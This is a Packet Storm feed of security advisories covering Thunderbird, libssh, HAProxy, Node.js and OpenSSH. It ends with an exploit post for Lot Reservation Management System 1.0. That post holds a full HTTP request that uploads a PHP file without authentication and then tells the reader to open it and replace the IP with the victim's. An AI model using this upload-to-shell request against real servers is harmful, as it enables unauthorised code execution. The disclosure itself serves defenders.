Red Hat Security Advisory 2024-0005-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0005.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0005-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0005  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0005-03

Red Hat Security Advisory 2024-0004-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0004.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0004-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0004  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0004-03

Red Hat Security Advisory 2024-0002-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0002.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0002-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0002  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0002-03

Red Hat Security Advisory 2024-0001-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0001.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0001-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0001  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0001-03

Debian Linux Security Advisory 5591-1 - Several vulnerabilities were discovered in libssh, a tiny C SSH library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5591-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 28, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libssh  
CVE ID         : CVE-2023-6004 CVE-2023-6918 CVE-2023-48795  
Debian Bug     : 1059004 1059059 1059061

Several vulnerabilities were discovered in libssh, a tiny C SSH library.

CVE-2023-6004

    It was reported that using the ProxyCommand or the ProxyJump feature  
    may allow an attacker to inject malicious code through specially  
    crafted hostnames.

CVE-2023-6918

    Jack Weinstein reported that missing checks for return values for  
    digests may result in denial of service (application crashes) or  
    usage of uninitialized memory.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

For the oldstable distribution (bullseye), these problems have been fixed  
in version 0.9.8-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 0.10.6-0+deb12u1.

We recommend that you upgrade your libssh packages.

For the detailed security status of libssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/libssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWNhadfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TR1w/+Mmnf9FXB5B5jQrYIpKB+7ksoXkhNRs92qXbM4SoMT9y8Kps2Ao4cyY7X  
8S8eyzwSF1Q847Pb2yfmjQqFwonbjca+uSsvVfITYl0lwZpvV8vIdtZNbQmFp9l9  
QTohScBg2xKrOZ/G9A3dih8vWAuvRwKq+5OqRyPt5cHGLZ9isyfF0ccsRvw41lbU  
Uu0sfOZetfsDIT1F2Fg3hQW4LzMA1n3yrRMQkOH9iJtdubAoyRE5MzVQktG5FpyG  
zcDD824k0vqAnKeulKhb8hf0vpkW2Ji1UDh3eFqoaYRppBFpNyOKSKP1m+pab6We  
aUVpIIZhFFIKovR/ZE4LSpTPb8ZLSkrpBSadtxQ1GzCq8EYTfTABVd1weaxaHhZZ  
ctrbXeY6EPwc2OQOOozCbyNERve1n5YqPiMfHEheDoaOkxMMB4fiNmXvveSq/eCN  
EhSzCdXCl4Z0SKk71gnXUw7G832p2He/mzkVJqZlUusCOWflrUXZa/fcEO+CQNvU  
ZRieJDmcXZDBlqC7HC9Khoonth5Gbst//UPL6zOYa2auJ+ftUZLvPeSGMrKdJ//0  
CNiG/pWEBggHku+wocggj9ie00hpAltuv6d3nVzLDSNntcDzZ2KpUS6f0Vo8jfm9  
PvJ4ymTrCDypWOVEmCPq4h68AFwv75q56lyhvPU0UxnW5524C/U=IV9+  
-----END PGP SIGNATURE-----

Debian Security Advisory 5591-1

Debian Linux Security Advisory 5590-1 - Several vulnerabilities were discovered in HAProxy, a fast and reliable load balancing reverse proxy, which can result in HTTP request smuggling or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5590-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 28, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : haproxyCVE ID         : CVE-2023-40225 CVE-2023-45539Debian Bug     : 1043502Several vulnerabilities were discovered in HAProxy, a fast and reliableload balancing reverse proxy, which can result in HTTP request smugglingor information disclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 2.2.9-2+deb11u6.For the stable distribution (bookworm), these problems have been fixed inversion 2.6.12-1+deb12u1.We recommend that you upgrade your haproxy packages.For the detailed security status of haproxy please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/haproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWNbchfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S/3g//a2z//lFBvMI5Awp2Sf/l4QEzwYffDa6V62Yjcryhv/+gpuDSNleuXFxu7JuDQHZzUNi+Lv1HBO5F+393dwSGLDKrdFwOJO9NNknmja9cGZgJ69D1EjDxgRMTRvTHm5T4rM6J/bdGF4z5c12TRtxQqhg3K+Eymvkv3DtSfMu/Nc5ePF9RXhiMk2U3wj+7ftDLta54BkzksCrIajfbPHN7XeSGzzJ6CI+5v7aVXbllc74WUO5hF4c51Yev+TrewQWOLg41LVXpk8SlEeGK3YN+JlQf+PtwRFlMeAeghwpGnEhm+0h5d/mg54FeQ3f4Kp46WJcPBJONn+M9nJzn6ujP99vtr3QA+mmJ+OPAUn8RLwUuLUKQdsN1PtNQImJe5LMFUQhon53i4p9yN1jmJ19l1uKjI4IbZSp2NCYBzHNyP0gfKONrbhzfp0trWbxRCC+byMBNOSwiYdCw1Zo9602HP8AoOtJd9bVa4o74gC9a+pzieKqZX0hdjlfBynJHq2KgKsu/gTNctOexjCGlckQ3EGLqgXqLBF6tZpE1AR78bpyT+XTfYRaW7mwaaAxsFDDVH757EsOqBnjKORdjlm/nLspAzoqxYSZfongjivXhYkCb27+jMizFOfjjd454amXH8UGrqf8a32gCef6ph9CEkRkxoa5lxRZx55r7Ml0MsdkiRn-----END PGP SIGNATURE-----

Debian Security Advisory 5590-1

Gentoo Linux Security Advisory 202312-16 - Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to code execution. Versions greater than or equal to 0.10.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libssh: Multiple Vulnerabilities  
     Date: December 28, 2023  
     Bugs: #920291, #920724  
       ID: 202312-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in libssh, the worst of  
which could lead to code execution.

Background  
=========  
libssh is a multiplatform C library implementing the SSHv2 protocol on  
client and server side.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-libs/libssh  < 0.10.6      >= 0.10.6

Description  
==========  
Multiple vulnerabilities have been discovered in libssh. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libssh users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/libssh-0.10.6"

References  
=========  
[ 1 ] CVE-2023-6004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6004  
[ 2 ] CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-48795

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-16

Gentoo Linux Security Advisory 202312-17 - Multiple vulnerabilities have been discovered in OpenSSH, the worst of which could lead to code execution. Versions greater than or equal to 9.6_p1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: OpenSSH: Multiple Vulnerabilities  
     Date: December 28, 2023  
     Bugs: #920292, #920722  
       ID: 202312-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in OpenSSH, the worst of  
which could lead to code execution.

Background  
=========  
OpenSSH is a free application suite consisting of server and clients  
that replace tools like telnet, rlogin, rcp and ftp with more secure  
versions offering additional functionality.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-misc/openssh  < 9.6_p1      >= 9.6_p1

Description  
==========  
Multiple vulnerabilities have been discovered in OpenSSH. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All OpenSSH users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openssh-9.6_p1"

References  
=========  
[ 1 ] CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-48795  
[ 2 ] CVE-2023-51385  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51385  
[ 3 ] CVE-2023-51385,CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51385,CVE-2023-48795

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-17

Debian Linux Security Advisory 5589-1 - Multiple vulnerabilities were discovered in Node.js, which could result in HTTP request smuggling, bypass of policy feature checks, denial of service or loading of incorrect ICU data.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5589-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 27, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : nodejsCVE ID         : CVE-2023-23918 CVE-2023-23919 CVE-2023-23920 CVE-2023-30581                 CVE-2023-30588 CVE-2023-30589 CVE-2023-30590 CVE-2023-32002                 CVE-2023-32006 CVE-2023-32559 CVE-2023-38552 CVE-2023-39333Debian Bug     : 1031834 1039990 1050739 1054892Multiple vulnerabilities were discovered in Node.js, which could result inHTTP request smuggling, bypass of policy feature checks, denial of serviceor loading of incorrect ICU data.For the stable distribution (bookworm), these problems have been fixed inversion 18.19.0+dfsg-6~deb12u1. In addition node-undici has been updatedin version 5.15.0+dfsg1+~cs20.10.9.3-1+deb12u3 to ensure compatibilitywith the updated Node version.We recommend that you upgrade your nodejs packages.For the detailed security status of nodejs please refer toits security tracker page at:https://security-tracker.debian.org/tracker/nodejsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWMn90ACgkQEMKTtsN8TjZhAQ/+NzOxtDTy7SnnKGRNeFo7V1CJWQEH6smafl/mbmyiBA/+4v16bmNhvCgFaQvBCYxsAeCHj+gqY+lesaF1WP4cAz1wewaEAr/Z7oMQ7z+2b7xT7tcCtnN+n+W2elN0Jok+KlNtaI/WD9diyCTHubCf6/Yv1Qbzw0ojl+0RC+J199Kka3yB156BeZslbWnCRRWfbnARLWJj1nKgggAoEcoclFhvY/2tkKzgrDEvRHGPKW9vNGWB0J4huZd49px9O3BhOVpmFzyI19hv5ukVsvgUcJsWfWAtKmW0t9YGX/b7dl2lz7ryhuGXnutA+oZ39sz5E9mOcWgBkbMkerVl9VN33QcZWWu3QxxRBMTkvvZui04p8c4YTYdhdagUcRTGqKioJFeStboCk8zurcaHGZet6ozRHty0AmGAKCFjFNPtwJAVtdJFdprP9iPEKe+o+piDqzXBeFZ/FRpd7GZQG12iYjPJ/dy7mVU/L3IRe3IO40qWgSy0fvDOLJ6kfEEMKwUtZaUebgFFbCI7AbPbK65nHyl0kAwDhx+ui1taHY4SrKYrxSeGlVYxHbBAOOFnxN1xofl7N+rCHwZCKjmvMOjdwkKNDX+Ib5wxL6MTOW0u/2muFwkcnFWuTW8gX2o+YfVkCqHhdAhaSx1mFmzL4HKGoXMv5zjfwtThdl9VDIw3CxM=TZEm-----END PGP SIGNATURE-----

Debian Security Advisory 5589-1

Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Tag

#linux